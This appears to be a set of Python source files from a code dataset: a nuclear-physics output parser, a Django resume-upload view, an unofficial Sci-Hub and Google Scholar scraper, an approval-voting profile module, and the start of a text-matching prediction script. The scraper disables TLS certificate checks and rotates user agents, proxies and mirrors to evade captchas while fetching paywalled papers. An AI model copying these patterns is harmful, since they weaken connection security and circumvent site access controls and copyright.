_LPT_CMNT_STR\nfrom deprecated.int.parser import zero_body_term, zero_body_term_line\nfrom parse import content_lines, comment_lines, fraction_str_to_float\nfrom parse import matches_completely\n\n\n# EXP\ndef _a_z_line(filepath):\n \"\"\"Get the line from the *.lpt file that contains A (mass number) and\n Z (proton number)\n :param filepath: path to *.lpt file\n \"\"\"\n return list(content_lines(filepath, _LPT_CMNT_STR))[_ROW_AZ]\n\n\ndef a_z(filepath):\n \"\"\"Return A and Z from a list of lines, whose a_z_line has the format\n a = [A] z = [Z]\n :param filepath: path to the *.lpt file\n :return: A, Z\n \"\"\"\n elts = _a_z_line(filepath).split()\n return int(elts[2]), int(elts[5]) # A, Z\n\n\ndef interaction(filepath):\n \"\"\"Assumes the grandparent directory will be named according to the\n interaction(s) used to generate the *.nushellx_lpt file\n :param filepath: the path describing the *.nushellx_lpt file\n :return: the interaction name\n \"\"\"\n return filepath.split(sep)[-3]\n\n\ndef exp(filepath):\n \"\"\"Get the elements necessary to form the ExpLpt for the given filepath\n :param filepath: path to the file\n :return: the tuple representation of the ExpLpt, that is (Z, interaction)\n \"\"\"\n return (\n a_z(filepath=filepath)[1],\n str(interaction(filepath=filepath))\n )\n\n\n# OTHER\ndef _zbt_from_lpt(fpath_lpt, fname_int_regex):\n \"\"\"From the file path to a *.lpt file (and assuming the associated\n interaction file is in the same directory), gets the zero body term\n from that interaction file\n :param fpath_lpt: path to the *.lpt file\n :param fname_int_regex: regular expression that will completely\n and uniquely match the file name of the interaction file associated\n with the given *.lpt 
file\n \"\"\"\n dirpath = path.split(fpath_lpt)[0]\n root, dirs, files = next(walk(dirpath))\n for fname in files:\n if matches_completely(fname_int_regex, fname):\n filepath_int = path.join(root, fname)\n return zero_body_term(\n zero_body_term_line(\n cmnt_lines=comment_lines(filepath=filepath_int,\n comment_str=_INT_CMNT_STR),\n zbt_comment=_INT_CMNT_STR_ZBT\n )\n )\n else:\n return None\n\n\n# DATA\ndef _spe_line(filepath):\n \"\"\"Returns the line containing single particle energies, adding an\n extra space at the occurrence of a - sign, since the code that writes\n the file does not ensure numbers are separated by spaces for some reason\n :param filepath: path to the *.lpt file\n \"\"\"\n return list(content_lines(\n filepath=filepath, comment_str=_LPT_CMNT_STR\n ))[_ROW_SPE].replace('-', ' -')\n\n\ndef _spe_line_data(spe_line):\n \"\"\"Retrieves a list of single particle energies (and whatever follows\n them) in the SPE line\n :param spe_line: string representation of the SPE line from a *.lpt file\n \"\"\"\n return [float(hd) for hd in spe_line.split()[_COL_START_SPE:]]\n\n\ndef _state_lines(filepath):\n \"\"\"Returns a list of state lines from the given *.lpt file\n :param filepath: path to *.lpt file\n \"\"\"\n cl = list(content_lines(filepath=filepath, comment_str=_LPT_CMNT_STR))\n row0 = _ROW_STATES_START\n if len(cl) < row0 + 1:\n return list([])\n else:\n return cl[row0:]\n\n\ndef _state_line_data(state_line):\n \"\"\"Given a single state lines, returns a list of items in the line,\n in their correct data representations. (floats, ints, etc)\n :param state_line: string representation of a *.lpt state line\n \"\"\"\n state_line_data = state_line.split()\n cbl = list()\n cbl.extend([int(bl) for bl in state_line_data[0:2]])\n cbl.extend([float(bl) for bl in state_line_data[2:4]])\n cbl.extend([fraction_str_to_float(bl) for bl in state_line_data[4:6]])\n cbl.append(int(state_line_data[6]))\n if len(state_line_data) == _NCOLS_STATE:\n cbl.extend([float(state_line_data[7]), state_line_data[8]])\n else:\n cbl.extend([None, state_line_data[7]])\n return cbl\n\n\ndef _state_lines_data(state_lines):\n \"\"\"Given a list of state lines (raw string representations of the\n state lines), maps the function _state_line_data onto this list to get\n a list of states.\n :param state_lines: list of state lines, where a state line is just the\n raw string representation of a state line from a *.lpt file\n \"\"\"\n cured_body_lists = list()\n parse_errors = list()\n for row in state_lines:\n try:\n state_line_data = _state_line_data(state_line=row)\n cured_body_lists.append(state_line_data)\n except ValueError:\n parse_errors += row\n continue\n return cured_body_lists, parse_errors\n\n\n# MAPS\ndef mass_to_spe_line_data_map(fpath_list):\n \"\"\"Returns a map\n A (mass number) -> list of SPE line elements,\n where the SPE line elements are just the white-space-separated values\n in the SPE line in a *.lpt file\n :param fpath_list: list of file paths to parse\n \"\"\"\n mh_map = dict()\n for f in fpath_list:\n mass = a_z(filepath=f)[0]\n mh_map[mass] = _spe_line_data(spe_line=_spe_line(filepath=f))\n return mh_map\n\n\ndef _n_to_state_data_map(state_lines_data):\n \"\"\"Returns a map from\n N (state index) -> State (list of state line data)\n where N uses the convention of the *.lpt files (beginning at 1 instead of\n 0)\n :param state_lines_data: list of state line data\n \"\"\"\n nb_map = dict()\n for cbl in state_lines_data:\n nb_map[cbl[0]] = cbl[1:]\n return nb_map\n\n\ndef 
mass_to_n_to_state_data_map(fpath_list):\n \"\"\"Returns a map\n A (mass number) -> N (state index) -> State (list of state data)\n :param fpath_list: list of files to parse\n \"\"\"\n mnb_map = dict()\n problem_files = list()\n for f in fpath_list:\n mass = a_z(f)[0]\n state_lines_data, parse_errors = _state_lines_data(\n state_lines=_state_lines(filepath=f))\n if len(parse_errors) > 0:\n problem_files.append(f)\n nb_map = _n_to_state_data_map(state_lines_data=state_lines_data)\n mnb_map[mass] = nb_map\n if len(problem_files) > 0:\n print('Problem parsing files:')\n for pf in problem_files:\n print(' {}'.format(pf))\n return mnb_map\n\n\ndef mass_to_zbt_map(fpath_list):\n \"\"\"Returns a map\n A (mass number) -> zero body term\n :param fpath_list: list of files to parse\n \"\"\"\n d = dict()\n for fp_lpt in fpath_list:\n mass = a_z(filepath=fp_lpt)[0]\n zbt = _zbt_from_lpt(fpath_lpt=fp_lpt, fname_int_regex=_RGX_FNAME_INT)\n d[mass] = zbt\n return d\n","sub_path":"src/deprecated/nushellx_lpt/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":7442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"179986969","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.template import loader\n\nfrom django.utils import timezone\nfrom models import Question,Document,Entry\nfrom .formc import MessageForm,SearchForm\nfrom crispy_forms.layout import Field\nfrom . import forms\nfrom . import pdf2txt\nimport StringIO\nimport docx,os\n\ndef getText(filename):\n doc = docx.Document(filename)\n fullText = []\n for para in doc.paragraphs:\n fullText.append(para.text)\n return '\\n'.join(fullText)\n\ndef update(request, data):\n val = request.POST.get('cid', False)\n if val and val > 0:\n d = Entry.objects.get(pk=val)\n if request.FILES.get('docfile', False):\n d.upload = request.FILES['docfile']\n d.resume = data\n if request.POST.get('name', False):\n d.name = request.POST['name']\n if request.POST.get('college_score', False):\n d.college_score = request.POST['college_score']\n if request.POST.get('company_score', False):\n d.company_score = request.POST['company_score']\n if request.POST.get('company', False):\n d.company = request.POST['company']\n if request.POST.get('skill', False):\n d.skill = request.POST['skill']\n if request.POST.get('college', False):\n d.college = request.POST['college']\n d.save()\n else:\n newdoc = Entry(upload = request.FILES['docfile'],\n name = request.POST['name'],\n college_score = request.POST['college_score'],\n company_score = request.POST['company_score'],\n college = request.POST['college'],\n skill = request.POST['skill'],\n company = request.POST['company'],\n resume = data)\n newdoc.save()\n\ndef getform(request):\n finish = \"\"\n success = False\n if request.method == 'POST':\n if request.FILES.get('docfile', False):\n filename, file_extension = os.path.splitext(request.FILES['docfile'].name)\n if file_extension == \".pdf\":\n k = pdf2txt.pdf2txt(request.FILES['docfile'])\n elif file_extension == \".docx\":\n k = getText(request.FILES['docfile'])\n update(request, k)\n elif request.POST.get('cid', False):\n update(request, \"\")\n else:\n return HttpResponse(\"Invalid File Type\")\n success = True\n form = MessageForm()\n #documents = Entry.objects.filter(resume__search=\"rrrrrr\")\n return render(request, \"formc.html\", {'form':form, 'success':success,\n 'modify':False})\n\ndef formc(request):\n return render(request, 'formc.html', {'form': 
MessageForm()})\n\ndef search(request):\n documents = None\n form = SearchForm()\n if request.method == 'POST':\n keywords = request.POST['keywords']\n documents = Entry.objects.filter(resume__search=keywords)\n #documents = Entry.objects.filter(pk=2)\n return render(request, 'search.html', {'form': form, 'documents':documents})\n\ndef modify(request):\n p = request.POST['id']\n documents = Entry.objects.filter(pk=p)\n if documents != None:\n for v in documents:\n form = MessageForm(initial={'name': v.name, 'college': v.college, 'cid':p,\n 'company': v.company, 'skill':v.skill})\n return render(request, 'formc.html', {'form': form, 'modify': True})\n return HttpResponse(\"Data not found\")\n\ndef index(request):\n return render(request, 'index.html', {})\n\ndef list_resume(request):\n documents = Entry.objects.all()\n return render(request, 'list.html', {'documents':documents})\n","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"270313408","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSci-API Unofficial API\n- [Search|Download] research papers from [scholar.google.com|sci-hub.io].\n- find metadata of an article.\n@author Wei Wu\n\"\"\"\n\nimport argparse\nimport hashlib\nimport logging\nimport os\nimport random\nimport requests\nfrom bs4 import BeautifulSoup\nfrom retrying import retry\nfrom crossref.restful import Works\nimport re\nfrom ylib import ylog\nfrom difflib import SequenceMatcher\nfrom ylib.yaml_config import Configuraion\nfrom urllib.parse import quote_plus\nfrom ylib.preprocessing import strip_punctuation\nconfig = Configuraion()\n\nconfig.load('/home/weiwu/projects/deep_learning/web_crawl/config.yaml')\nUSER_AGENT = config.USER_AGENT\nDOMAIN = config.DOMAIN\nBLACK_DOMAIN = config.BLACK_DOMAIN\nURL_SEARCH = config.URL_GOOGLE_SEARCH\nPROXIES = config.PROXIES\nURL_SEARCH = config.URL_GOOGLE_SCHOLAR\nURL_NEXT = config.URL_GOOGLE_SCHOLAR_NEXT\n\nylog.set_level(logging.DEBUG)\nylog.console_on()\nylog.filelog_on(\"app\")\n\n# log config\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s')\nlogger = logging.getLogger('Sci-Hub')\nlogger.setLevel(logging.DEBUG)\n\n# constants\nSCIHUB_BASE_URL = 'http://sci-hub.cc/'\nSCHOLARS_BASE_URL = 'https://scholar.google.com/scholar'\nHEADERS = {\n 'User-Agent':\n 'Mozilla/5.0 (X11; Linux x86_64; rv:27.0) Gecko/20100101 Firefox/27.0'\n}\nAVAILABLE_SCIHUB_BASE_URL = [\n 'sci-hub.tw', 'sci-hub.hk', 'sci-hub.la', 'sci-hub.mn', 'sci-hub.name',\n 'sci-hub.is', 'sci-hub.tv'\n 'sci-hub.ws'\n 'www.sci-hub.cn'\n 'sci-hub.sci-hub.hk', 'sci-hub.sci-hub.tw', 'sci-hub.sci-hub.mn',\n 'sci-hub.sci-hub.tv', 'tree.sci-hub.la'\n]\n\n\nclass SciHub(object):\n \"\"\"\n SciHub class can search for papers on Google Scholars\n and fetch/download papers from sci-hub.io\n \"\"\"\n\n def __init__(self):\n requests.packages.urllib3.disable_warnings(\n requests.packages.urllib3.exceptions.InsecureRequestWarning)\n self.sess = requests.Session()\n self.sess.headers = {'user-agent': self.get_random_user_agent()}\n self.available_base_url_list = AVAILABLE_SCIHUB_BASE_URL\n self.base_url = 'http://' + self.available_base_url_list[0] + '/'\n self.works = Works()\n self.sess.proxies = PROXIES\n self.re_bracket = re.compile(\"\\[(.*?)\\]\\s\")\n\n def get_random_user_agent(self):\n return random.choice(self.read_file('user_agents.txt', USER_AGENT))\n\n def get_random_domain(self):\n domain = 
random.choice(self.read_file('all_domain.txt', DOMAIN))\n if domain in BLACK_DOMAIN:\n self.get_random_domain()\n else:\n return domain\n\n def read_file(self, filename, default=''):\n # root_folder = os.path.dirname(__file__)\n root_folder = os.getcwd()\n user_agents_file = os.path.join(\n os.path.join(root_folder, 'data'), filename)\n try:\n with open(user_agents_file) as fp:\n data = [_.strip() for _ in fp.readlines()]\n except:\n data = [default]\n return data\n\n def set_proxy(self, proxy):\n '''\n set proxy for session\n :param proxy_dict:\n :return:\n '''\n # if proxy:\n # self.sess.proxies = {\n # \"http\": proxy,\n # \"https\": proxy,\n # }\n self.sess.proxies = PROXIES\n\n @retry(\n wait_random_min=200, wait_random_max=2000, stop_max_attempt_number=10)\n def find_meta(self, identifier):\n \"\"\" find metadata with title or DOI\n Keyword Arguments:\n identifier --\n \"\"\"\n try:\n # verify=False is dangerous but sci-hub.io\n # requires intermediate certificates to verify\n # and requests doesn't know how to download them.\n # as a hacky fix, you can add them to your store\n # and verifying would work. will fix this later.\n url = self.base_url + identifier['article_link']\n self.sess.headers = {'user-agent': self.get_random_user_agent()}\n res = self.sess.get(url, verify=False, allow_redirects=False)\n re_bracket = re.compile(\"\\[(.*?)\\]\\s\")\n title = re.sub(re_bracket, \"\", identifier['name'])\n ylog.debug('*' * 80)\n ylog.debug(\"title: %s\" % title)\n ylog.debug(res.status_code)\n # self.out.ix[title]['status_code'] = res.status_code\n ylog.debug(\"headers: %s\" % res.headers['Content-Type'])\n ylog.debug('location: %s' % res.headers.get(\"Location\"))\n # self.out.ix[title]['location'] = res.headers.get(\"Location\")\n search_title = True\n if not res.headers.get(\"Location\"):\n content = res.content\n if len(content) > 2:\n import cchardet\n charset = cchardet.detect(content)\n text = content.decode(charset['encoding'])\n soup = BeautifulSoup(text, \"lxml\")\n script = soup.script.get_text()\n doi_regexp = '10[.][0-9]{4,}(?:[.][0-9]+)*/(?:(?![\"&\\'<>])\\S)+'\n try:\n doi_match = re.compile(doi_regexp).findall(script)[0]\n ylog.info(\"DOI: %s\" % doi_match)\n search_title = False\n # use crossref API to get metadata\n works = Works()\n w1 = works.query(doi_match).sort('relevance').order(\n 'desc')\n i = 0\n for item in w1:\n # TODO: verify title\n # self.out.ix[title]['DOI'] = item['DOI']\n return item\n# return {'meta': item['DOI'], 'url': url}\n except IndexError:\n ylog.debug('failed to find regexp')\n elif search_title:\n works = Works()\n w1 = works.query(title).sort('relevance').order('desc')\n i = 0\n for item in w1:\n i = i + 1\n try:\n # ylog.debug('crossref item title ')\n t = item.get('title')[0]\n # ylog.debug(t)\n sub_title = item.get('subtitle')[0]\n # ylog.debug(sub_title)\n # ylog.debug(\"ratio: %s\" %\n # (SequenceMatcher(a=title, b=t).ratio()))\n except TypeError:\n sub_title = ''\n if SequenceMatcher(\n a=title, b=t).ratio() > 0.9 or SequenceMatcher(\n a=title, b=sub_title).ratio(\n ) > 0.9 or t.startswith(title):\n ylog.debug(\"DOI %s\" % item['DOI'])\n # self.out.ix[title]['DOI'] = item['DOI']\n return item\n\n\n# return {'meta': item['DOI'], 'url': url}\n if i > 18:\n # ylog.debug('[x]%s' % title)\n # ylog.debug(item['title'])\n return None\n\n except requests.exceptions.ConnectionError:\n logger.info('{} cannot acess,changing'.format(\n self.available_base_url_list[0]))\n self._change_base_url()\n\n except requests.exceptions.RequestException as 
e:\n\n return {\n 'err':\n 'Failed to fetch pdf with identifier %s (resolved url %s) due to request exception.'\n % (identifier, url)\n }\n\n def _change_base_url(self):\n del self.available_base_url_list[0]\n self.base_url = 'http://' + self.available_base_url_list[0] + '/'\n logger.info(\n \"I'm changing to {}\".format(self.available_base_url_list[0]))\n\n def req_url(self, query, language=None, start=0, pause=2):\n # domain = ''\n domain = self.get_random_domain()\n if start > 0:\n url = URL_NEXT\n url = url.format(\n domain=domain, query=quote_plus(query), start=start)\n else:\n\n url = URL_SEARCH\n url = url.format(\n domain=domain, query=quote_plus(query), language=language)\n return url\n\n def search(self, query, limit=10, download=False):\n \"\"\"\n Performs a query on scholar.google.com, and returns a dictionary\n of results in the form {'papers': ...}. Unfortunately, as of now,\n captchas can potentially prevent searches after a certain limit.\n \"\"\"\n start = 0\n results = {'papers': []}\n\n while True:\n try:\n self.sess.headers = {'user-agent': self.get_random_user_agent()}\n res = self.sess.get(\n SCHOLARS_BASE_URL,\n allow_redirects=True,\n params={\n 'q': query,\n 'hl': 'en',\n 'start': start,\n 'as_sdt': '0,5'\n })\n ylog.debug(res.url)\n except requests.exceptions.RequestException as e:\n results[\n 'err'] = 'Failed to complete search with query %s (connection error)' % query\n return results\n\n s = self._get_soup(res.content)\n papers = s.find_all('div', class_=\"gs_r\")\n\n if not papers:\n if 'CaptchaRedirect' in res.content:\n results[\n 'err'] = 'Failed to complete search with query %s (captcha)' % query\n return results\n\n for paper in papers:\n if not paper.find('table'):\n source = None\n pdf = paper.find('div', class_='gs_ggs gs_fl')\n link = paper.find('h3', class_='gs_rt')\n # find link type,\n try:\n url_type = paper.find(\n 'span', class_='gs_ctg2').get_text()[1:-1]\n except:\n url_type = None\n\n if pdf:\n source = pdf.find('a')['href']\n elif link.find('a'):\n source = link.find('a')['href']\n else:\n continue\n article_link = link.find('a')['href']\n title = link.text.replace(\"\\xa0…\", \"\")\n title = re.sub(self.re_bracket, \"\", title)\n title = strip_punctuation(title)\n results['papers'].append({\n 'name': title,\n 'url': source,\n 'article_link': article_link,\n 'type': url_type\n })\n\n if len(results['papers']) >= limit:\n return results\n\n start += 10\n\n @retry(\n wait_random_min=100, wait_random_max=1000, stop_max_attempt_number=10)\n def download(self, identifier, destination='', path=None):\n \"\"\"\n Downloads a paper from sci-hub given an indentifier (DOI, PMID, URL).\n Currently, this can potentially be blocked by a captcha if a certain\n limit has been reached.\n \"\"\"\n data = self.fetch(identifier)\n\n if not 'err' in data:\n self._save(\n data['pdf'],\n os.path.join(\n destination, path if path else\n data['name'].encode('utf-8').decode('utf-8').strip()))\n\n return data\n\n def fetch(self, identifier):\n \"\"\"\n Fetches the paper by first retrieving the direct link to the pdf.\n If the indentifier is a DOI, PMID, or URL pay-wall, then use Sci-Hub\n to access and download paper. 
Otherwise, just download paper directly.\n \"\"\"\n if identifier['type'] == 'PDF':\n url = identifier['url']\n else:\n url = self._get_direct_url(identifier['url'])\n\n try:\n # verify=False is dangerous but sci-hub.io\n # requires intermediate certificates to verify\n # and requests doesn't know how to download them.\n # as a hacky fix, you can add them to your store\n # and verifying would work. will fix this later.\n self.sess.headers = {'user-agent': self.get_random_user_agent()}\n res = self.sess.get(url, verify=False)\n\n if res.headers['Content-Type'] != 'application/pdf':\n self._change_base_url()\n raise CaptchaNeedException(\n 'Failed to fetch pdf with identifier %s '\n '(resolved url %s) due to captcha' % (identifier, url))\n # return {\n # 'err': 'Failed to fetch pdf with identifier %s (resolved url %s) due to captcha'\n # % (identifier, url)\n # }\n else:\n return {\n 'pdf': res.content,\n 'url': url,\n 'name': identifier['name'] + '.pdf'\n # 'name': self._generate_name(res)\n }\n\n except requests.exceptions.ConnectionError:\n logger.info('{} cannot acess,changing'.format(\n self.available_base_url_list[0]))\n self._change_base_url()\n\n except requests.exceptions.RequestException as e:\n\n return {\n 'err':\n 'Failed to fetch pdf with identifier %s (resolved url %s) due to request exception.'\n % (identifier, url)\n }\n\n def _get_direct_url(self, identifier):\n \"\"\"\n Finds the direct source url for a given identifier.\n \"\"\"\n id_type = self._classify(identifier)\n\n return identifier if id_type == 'url-direct' \\\n else self._search_direct_url(identifier)\n\n def _search_direct_url(self, identifier):\n \"\"\"\n Sci-Hub embeds papers in an iframe. This function finds the actual\n source url which looks something like https://moscow.sci-hub.io/.../....pdf.\n \"\"\"\n self.sess.headers = {'user-agent': self.get_random_user_agent()}\n res = self.sess.get(self.base_url + identifier, verify=False)\n s = self._get_soup(res.content)\n iframe = s.find('iframe')\n if iframe:\n return iframe.get('src') if not iframe.get('src').startswith('//') \\\n else 'http:' + iframe.get('src')\n\n def _classify(self, identifier):\n \"\"\"\n Classify the type of identifier:\n url-direct - openly accessible paper\n url-non-direct - pay-walled paper\n pmid - PubMed ID\n doi - digital object identifier\n \"\"\"\n if (identifier.startswith('http') or identifier.startswith('https')):\n if identifier.endswith('pdf'):\n return 'url-direct'\n else:\n return 'url-non-direct'\n elif identifier.isdigit():\n return 'pmid'\n else:\n return 'doi'\n\n def _save(self, data, path):\n \"\"\"\n Save a file give data and a path.\n \"\"\"\n with open(path, 'wb') as f:\n f.write(data)\n\n def _get_soup(self, html):\n \"\"\"\n Return html soup.\n \"\"\"\n return BeautifulSoup(html, 'html.parser')\n\n def _generate_name(self, res):\n \"\"\"\n Generate unique filename for paper. 
Returns a name by calcuating\n md5 hash of file contents, then appending the last 20 characters\n of the url which typically provides a good paper identifier.\n \"\"\"\n name = res.url.split('/')[-1]\n pdf_hash = hashlib.md5(res.content).hexdigest()\n return '%s-%s' % (pdf_hash, name[-20:])\n\n\nclass CaptchaNeedException(Exception):\n pass\n\n\ndef main():\n sh = SciHub()\n\n parser = argparse.ArgumentParser(\n description='SciHub - To remove all barriers in the way of science.')\n parser.add_argument(\n '-d',\n '--download',\n metavar='(DOI|PMID|URL)',\n help='tries to find and download the paper',\n type=str)\n parser.add_argument(\n '-f',\n '--file',\n metavar='path',\n help='pass file with list of identifiers and download each',\n type=str)\n parser.add_argument(\n '-s',\n '--search',\n metavar='query',\n help='search Google Scholars',\n type=str)\n parser.add_argument(\n '-sd',\n '--search_download',\n metavar='query',\n help='search Google Scholars and download if possible',\n type=str)\n parser.add_argument(\n '-l',\n '--limit',\n metavar='N',\n help='the number of search results to limit to',\n default=10,\n type=int)\n parser.add_argument(\n '-o',\n '--output',\n metavar='path',\n help='directory to store papers',\n default='',\n type=str)\n parser.add_argument(\n '-v',\n '--verbose',\n help='increase output verbosity',\n action='store_true')\n parser.add_argument(\n '-p',\n '--proxy',\n help='via proxy format like socks5://user:pass@host:port',\n action='store',\n type=str)\n\n args = parser.parse_args()\n\n if args.verbose:\n logger.setLevel(logging.DEBUG)\n if args.proxy:\n sh.set_proxy(args.proxy)\n\n if args.download:\n result = sh.download(args.download, args.output)\n if 'err' in result:\n logger.debug('%s', result['err'])\n else:\n logger.debug('Successfully downloaded file with identifier %s',\n args.download)\n elif args.search:\n results = sh.search(args.search, args.limit)\n if 'err' in results:\n logger.debug('%s', results['err'])\n else:\n logger.debug('Successfully completed search with query %s',\n args.search)\n print(results)\n elif args.search_download:\n results = sh.search(args.search_download, args.limit)\n if 'err' in results:\n logger.debug('%s', results['err'])\n else:\n logger.debug('Successfully completed search with query %s',\n args.search_download)\n for paper in results['papers']:\n result = sh.download(paper['url'], args.output)\n if 'err' in result:\n logger.debug('%s', result['err'])\n else:\n logger.debug(\n 'Successfully downloaded file with identifier %s',\n paper['url'])\n elif args.file:\n with open(args.file, 'r') as f:\n identifiers = f.read().splitlines()\n for identifier in identifiers:\n result = sh.download(identifier, args.output)\n if 'err' in result:\n logger.debug('%s', result['err'])\n else:\n logger.debug(\n 'Successfully downloaded file with identifier %s',\n identifier)\n\n\nif __name__ == '__main__':\n main()\n\n# sh = SciHub()\n# title = \"\"\"Improving Traffic Locality in BitTorrent via Biased Neighbor Selection\"\"\"\n# meta = sh.find_meta(title)\n# result = sh.download(\n# meta.get('link')[0].get('URL'), path='./data/pdf/' + title + '.pdf')\n\n# search and download\nsh = SciHub()\n# retrieve 5 articles on Google Scholars related to 'bittorrent'\nresults = sh.search('nlp', 5)\n# download the papers; will use sci-hub.io if it must\nfor paper in results['papers']:\n logger.debug(paper)\n # paper['meta'] = None\n paper['doi'] = sh.find_meta(paper)\n sh.download(paper, './data')\n\n# # exactly the same thing as fetch except 
downloads the articles to disk\n# # if no path given, a unique name will be used as the file name\n# result = sh.download(\n# 'http://ieeexplore.ieee.org/abstract/document/1648853/', path='paper.pdf')\n\n# # result = sh.download('10.1145/2449396.2449413', path='paper.pdf')\n# # result = sh.download(meta.get('DOI'), path=title + '.pdf')\n# meta = {}\n# # sh = SciHub()\n# for paper in results['papers']:\n# paper['doi'] = sh.find_meta(paper)\n","sub_path":"scholar/scihub.py","file_name":"scihub.py","file_ext":"py","file_size_in_byte":20471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"325989180","text":"\"\"\"\nPreference profiles and voters\n Preference profiles consist of voters.\n Voters in a profile are indexed by 0, ..., len(profile)-1\n Candidates are indexed by 0, ..., profile.num_cand-1\n The preferences of voters are specified by approval sets, which are sets of candidates.\n\"\"\"\n\n\nfrom abcvoting.misc import str_set_of_candidates\nfrom collections import OrderedDict\n\n\nclass Profile(object):\n \"\"\"\n Preference profiles consisting of approval sets.\n\n Properties\n ----------\n num_cand : int\n number of candidates or alternatives, denoted with m in the survey paper\n cand_names : iterable of str\n symbolic names for the candidates, defaults to '1', '2', ..., str(num_cand)\n _voters : list of Voter\n the list of voters, use `Profile.add_voter()` or `Profile.add_voters()`\n to add voters\n\n \"\"\"\n\n def __init__(self, num_cand, cand_names=None):\n if num_cand <= 0:\n raise ValueError(str(num_cand) + \" is not a valid number of candidates\")\n self.candidates = list(range(num_cand))\n self._voters = []\n self._approved_candidates = None\n self.cand_names = [str(cand) for cand in range(num_cand)]\n if cand_names:\n if len(cand_names) < num_cand:\n raise ValueError(\n f\"cand_names {str(cand_names)} has length {len(cand_names)}\"\n f\"< num_cand ({num_cand})\"\n )\n self.cand_names = [str(cand_names[i]) for i in range(num_cand)]\n\n @property\n def num_cand(self): # number of candidates\n return len(self.candidates)\n\n @property\n def approved_candidates(self): # candidates approved by at least one voter\n if self._approved_candidates is None:\n _approved_candidates = set()\n for voter in self._voters:\n _approved_candidates.update(voter.approved)\n return _approved_candidates\n\n def __len__(self):\n return len(self._voters)\n\n def add_voter(self, voter):\n \"\"\"\n Adds a set of approved candidates of one voter to the preference profile.\n\n Parameters\n ----------\n voter : Voter or iterable of int\n\n \"\"\"\n # note that we trust that each set in self._voters is a unique object even if\n # voter.approved might not be unique, because it is used as dict key\n # (see e.g. 
the variable utility in abcrules_gurobi or propositionA3.py)\n if isinstance(voter, Voter):\n _voter = voter\n else:\n _voter = Voter(voter)\n\n # there might be new approved candidates,\n # but update self._approved_candidates only on demand\n self._approved_candidates = None\n\n # this check is a bit redundant, but needed to check for consistency with self.num_cand\n _voter.check_valid(self.num_cand)\n self._voters.append(_voter)\n\n def add_voters(self, voters):\n \"\"\"\n Adds several voters to the preference profile.\n Each voter is specified by a set (or list) of approved candidates\n or by an object of type Voter.\n\n Parameters\n ----------\n voters : iterable of Voter or iterable of iterables of int\n\n \"\"\"\n for voter in voters:\n self.add_voter(voter)\n\n def totalweight(self):\n return sum(voter.weight for voter in self._voters)\n\n def has_unit_weights(self):\n return all(voter.weight == 1 for voter in self._voters)\n\n def __iter__(self):\n return iter(self._voters)\n\n def __getitem__(self, i):\n return self._voters[i]\n\n def __str__(self):\n if self.has_unit_weights():\n output = f\"profile with {len(self._voters)} votes and {self.num_cand} candidates:\\n\"\n for voter in self._voters:\n output += \" \" + str_set_of_candidates(voter.approved, self.cand_names) + \",\\n\"\n else:\n output = (\n f\"weighted profile with {len(self._voters)} votes\"\n f\" and {self.num_cand} candidates:\\n\"\n )\n for voter in self._voters:\n output += f\" {voter.weight} * \"\n output += f\"{str_set_of_candidates(voter.approved, self.cand_names)} ,\\n\"\n return output[:-2]\n\n def is_party_list(self):\n \"\"\"\n Is this party a party-list profile?\n In a party-list profile all approval sets are either\n disjoint or equal (see https://arxiv.org/abs/1704.02453).\n \"\"\"\n return all(\n len(voter1.approved & voter2.approved) in (0, len(voter1.approved))\n for voter1 in self._voters\n for voter2 in self._voters\n )\n\n def str_compact(self):\n compact = OrderedDict()\n for voter in self._voters:\n if tuple(voter.approved) in compact:\n compact[tuple(voter.approved)] += voter.weight\n else:\n compact[tuple(voter.approved)] = voter.weight\n if self.has_unit_weights():\n output = \"\"\n else:\n output = \"weighted \"\n output += \"profile with %d votes and %d candidates:\\n\" % (len(self._voters), self.num_cand)\n for approval_set in compact:\n output += (\n \" \"\n + str(compact[approval_set])\n + \" x \"\n + str_set_of_candidates(approval_set, self.cand_names)\n + \",\\n\"\n )\n output = output[:-2]\n if not self.has_unit_weights():\n output += \"\\ntotal weight: \" + str(self.totalweight())\n output += \"\\n\"\n\n return output\n\n\nclass Voter:\n \"\"\"\n A set of approved candidates by one voter.\n \"\"\"\n\n def __init__(self, approved, weight=1):\n self.approved = set(approved) # approval set, i.e., the set of approved candidates\n self.weight = weight\n\n # does not check for num_cand, because not known here\n self.check_valid(approved_raw=approved)\n\n def __str__(self):\n return str(list(self.approved))\n\n # some shortcuts, removed for clarity\n #\n # def __len__(self):\n # return len(self.approved)\n #\n # def __iter__(self):\n # return iter(self.approved)\n\n def check_valid(self, num_cand=float(\"inf\"), approved_raw=None):\n \"\"\"\n Check if approved candidates are given as non-negative integers. If `num_cand` is known,\n also check if they are too large. 
Double entries are checked if approved_raw is given as\n a list or tuple (or similar).\n \"\"\"\n if approved_raw is not None and len(self.approved) < len(approved_raw):\n raise ValueError(\n f\"double entries found in list of approved candidates: {approved_raw}\"\n )\n\n # note: empty approval sets are fine\n for candidate in self.approved:\n if not isinstance(candidate, int):\n raise TypeError(\n f\"Object of type {str(type(candidate))} not suitable as candidate, \"\n f\"only non-negative integers allowed.\"\n )\n if candidate < 0 or candidate >= num_cand:\n raise ValueError(str(self) + \" not valid for num_cand = \" + str(num_cand))\n","sub_path":"abcvoting/preferences.py","file_name":"preferences.py","file_ext":"py","file_size_in_byte":7206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"206966869","text":"#encoding=utf8\n\nimport tensorflow as tf\nimport numpy as np\nimport sys\nimport csv\nsys.path.append('../')\nfrom drcn import DRCN\nfrom load_data import load_word_embed, load_char_embed, load_all_data\nfrom line_profiler_pycharm import profile\n\n\nnp.random.seed(1)\ntf.set_random_seed(1)\n\n@profile\ndef yuce(): # yuce (Chinese pinyin) means predict: scores one pair of input texts\n\n base_params = {\n 'num_classes':2,\n 'max_features':1700,\n 'embed_size':100,\n 'filters':300,\n 'kernel_size':3,\n 'strides':1,\n 'padding':'same',\n 'conv_activation_func':'relu',\n 'embedding_matrix':[],\n 'w_initializer':'random_uniform',\n 